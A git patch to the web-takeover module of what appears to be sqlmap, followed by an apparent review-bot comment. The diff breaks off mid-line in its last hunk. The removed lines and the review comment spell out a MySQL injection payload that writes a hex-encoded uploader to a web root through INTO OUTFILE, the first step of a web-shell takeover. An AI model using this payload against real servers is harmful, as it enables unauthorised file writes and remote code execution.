From cbe8f417460aa8e2952c31945535cc141be8e7f6 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Fri, 20 Jul 2012 16:20:17 +0100
Subject: [PATCH] minor code refactoring preparing for #96
---
 lib/takeover/web.py | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 55f69db96..6c7c7ffa1 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -18,6 +18,7 @@ from lib.core.common import decloakToNamedTemporaryFile
 from lib.core.common import extractRegexResult
 from lib.core.common import getDirs
 from lib.core.common import getDocRoot
+from lib.core.common import getSQLSnippet
 from lib.core.common import ntToPosixSlashes
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import isWindowsDriveLetterPath
@@ -32,6 +33,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import DBMS
 from lib.core.enums import OS
 from lib.core.enums import PAYLOAD
 from lib.request.connect import Connect as Request
@@ -115,8 +117,7 @@ class Web:
 randInt = randomInt()
 query += "OR %d=%d " % (randInt, randInt)
- query += "LIMIT 1 INTO OUTFILE '%s' " % outFile
- query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
+ query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
 query = agent.prefixQuery(query)
 query = agent.suffixQuery(query)
 payload = agent.payload(newValue=query)
@@ -247,8 +248,8 @@ class Web:
 continue
 elif "<%" in uplPage or "
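Review bot: The `getSQLSnippet(DBMS.MYSQL, "write_file_limit", ...)` call in the third hunk depends on a snippet template that this patch does not carry (the diffstat lists only lib/takeover/web.py), so the template must already exist and must expand to exactly the two removed lines, including the trailing space after the quoted file name and the closing ` --`. If the template is missing or differs in spacing, the statement built here changes or fails at runtime, and nothing in this file shows why. I would add a comment above the call, for example `# expands to: LIMIT 1 INTO OUTFILE '<OUTFILE>' LINES TERMINATED BY 0x<HEXSTRING> --`, so the statement shape stays visible at the call site, and confirm that the `OUTFILE` and `HEXSTRING` keyword names match the placeholders in the template. The enclosing method starts and ends outside the hunk.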